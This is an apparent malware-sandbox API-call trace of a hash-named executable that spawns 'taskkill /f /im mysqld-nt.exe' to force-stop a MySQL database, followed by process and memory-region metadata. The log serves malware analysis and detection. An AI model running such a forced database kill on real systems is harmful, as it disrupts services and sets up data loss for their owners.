[0190.996] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0190.996] GetUserDefaultLCID () returned 0x409 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0190.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0190.997] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.999] GetProcessHeap () returned 0x430000 [0190.999] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x43aa58 [0190.999] GetConsoleTitleW (in: lpConsoleTitle=0x43aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0191.001] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0191.001] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0191.001] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0191.001] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0191.002] GetProcessHeap () returned 0x430000 [0191.002] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x43bc50 [0191.002] GetProcessHeap () returned 0x430000 [0191.003] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43bc50) returned 1 [0191.003] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0191.003] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0191.003] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0191.003] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0191.003] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0191.003] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0191.004] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0191.004] GetProcessHeap () returned 0x430000 [0191.004] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x43ac70 [0191.004] GetProcessHeap () returned 0x430000 [0191.004] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x430578 [0191.004] GetProcessHeap () returned 0x430000 [0191.004] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x36) returned 0x43acd0 [0191.005] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0191.007] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0191.007] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0191.007] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0191.007] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0191.007] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0191.007] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0191.007] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0191.007] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0191.007] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0191.007] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0191.007] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0191.008] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0191.008] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0191.008] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0191.008] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0191.008] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0191.008] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0191.008] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0191.008] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0191.008] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0191.008] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0191.008] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0191.008] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0191.008] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0191.008] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0191.008] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0191.008] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0191.008] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0191.008] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0191.008] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0191.008] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0191.008] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0191.008] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0191.008] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0191.008] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0191.008] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0191.008] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0191.009] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0191.009] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0191.009] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0191.009] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0191.009] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0191.009] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0191.009] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0191.009] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0191.009] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0191.009] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0191.009] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0191.009] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0191.009] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0191.009] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0191.009] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0191.009] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0191.009] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0191.009] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0191.009] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0191.009] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0191.009] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0191.009] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0191.009] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0191.009] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0191.009] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0191.009] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0191.010] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0191.010] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0191.010] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0191.010] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0191.010] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0191.010] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0191.010] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0191.010] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0191.010] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0191.010] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0191.010] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0191.010] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0191.010] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0191.010] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0191.010] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0191.010] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0191.010] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0191.010] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0191.010] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0191.010] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0191.010] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0191.010] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0191.010] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0191.010] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0191.011] GetProcessHeap () returned 0x430000 [0191.011] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x43ad10 [0191.011] GetProcessHeap () returned 0x430000 [0191.011] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x43af28 [0191.011] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0191.011] GetProcessHeap () returned 0x430000 [0191.011] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x418) returned 0x4305c8 [0191.011] SetErrorMode (uMode=0x0) returned 0x8003 [0191.011] SetErrorMode (uMode=0x1) returned 0x0 [0191.011] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4305d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0191.011] SetErrorMode (uMode=0x8003) returned 0x1 [0191.011] GetProcessHeap () returned 0x430000 [0191.012] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4305c8, Size=0x56) returned 0x4305c8 [0191.012] GetProcessHeap () returned 0x430000 [0191.012] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4305c8) returned 0x56 [0191.012] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0191.012] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.012] GetProcessHeap () returned 0x430000 [0191.012] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x110) returned 0x43af78 [0191.012] GetProcessHeap () returned 0x430000 [0191.012] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x218) returned 0x430628 [0191.017] GetProcessHeap () returned 0x430000 [0191.017] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x430628, Size=0x112) returned 0x430628 [0191.017] GetProcessHeap () returned 0x430000 [0191.017] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x430628) returned 0x112 [0191.017] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0191.017] GetProcessHeap () returned 0x430000 [0191.017] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe0) returned 0x43b090 [0191.019] GetProcessHeap () returned 0x430000 [0191.019] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x43b090, Size=0x76) returned 0x43b090 [0191.019] GetProcessHeap () returned 0x430000 [0191.019] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x43b090) returned 0x76 [0191.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0191.019] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0191.020] GetLastError () returned 0x2 [0191.020] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0191.020] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x43b110 [0191.020] GetProcessHeap () returned 0x430000 [0191.020] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x14) returned 0x437528 [0191.020] FindClose (in: hFindFile=0x43b110 | out: hFindFile=0x43b110) returned 1 [0191.020] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0191.020] GetLastError () returned 0x2 [0191.020] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x43b110 [0191.020] GetProcessHeap () returned 0x430000 [0191.020] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x437528, Size=0x4) returned 0x43b150 [0191.020] FindClose (in: hFindFile=0x43b110 | out: hFindFile=0x43b110) returned 1 [0191.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.021] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0191.024] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0191.024] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0191.024] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0191.025] GetProcessHeap () returned 0x430000 [0191.025] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x18) returned 0x437528 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0191.025] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0191.026] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0191.026] GetProcessHeap () returned 0x430000 [0191.026] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437528) returned 1 [0191.026] GetProcessHeap () returned 0x430000 [0191.026] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa) returned 0x43b110 [0191.026] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.031] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mysqld-nt.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mysqld-nt.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mysqld-nt.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x674, dwThreadId=0x968)) returned 1 [0191.056] CloseHandle (hObject=0x98) returned 1 [0191.056] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.056] GetProcessHeap () returned 0x430000 [0191.057] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439d50) returned 1 [0191.059] GetEnvironmentStringsW () returned 0x439d50* [0191.059] GetProcessHeap () returned 0x430000 [0191.059] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa76) returned 0x437cc0 [0191.059] FreeEnvironmentStringsA (penv="=") returned 1 [0191.059] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0192.293] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0192.294] CloseHandle (hObject=0x9c) returned 1 [0192.294] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0192.295] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0192.297] GetProcessHeap () returned 0x430000 [0192.297] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437cc0) returned 1 [0192.297] GetEnvironmentStringsW () returned 0x43b160* [0192.297] GetProcessHeap () returned 0x430000 [0192.297] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa9c) returned 0x437cc0 [0192.297] FreeEnvironmentStringsA (penv="=") returned 1 [0192.297] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0192.298] GetProcessHeap () returned 0x430000 [0192.298] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x437cc0) returned 1 [0192.298] GetEnvironmentStringsW () returned 0x43b160* [0192.298] GetProcessHeap () returned 0x430000 [0192.298] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa9c) returned 0x437cc0 [0192.298] FreeEnvironmentStringsA (penv="=") returned 1 [0192.298] GetProcessHeap () returned 0x430000 [0192.298] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43b110) returned 1 [0192.298] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0192.298] _get_osfhandle (_FileHandle=1) returned 0x144 [0192.298] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0192.298] _get_osfhandle (_FileHandle=1) returned 0x144 [0192.298] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0192.298] _get_osfhandle (_FileHandle=0) returned 0x140 [0192.298] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0192.298] GetConsoleOutputCP () returned 0x1b5 [0192.302] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0192.302] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.306] exit (_Code=128) Thread: id = 264 os_tid = 0x694 Process: id = "49" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2fdb2000" os_pid = "0x674" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0xc7c" cmd_line = "taskkill /f /im mysqld-nt.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3658 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3659 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3660 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3661 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3662 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3663 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3664 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3665 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3666 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3667 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3668 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3669 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3670 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3671 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3672 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3673 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3674 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3675 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3676 start_va = 0x4150000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3677 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 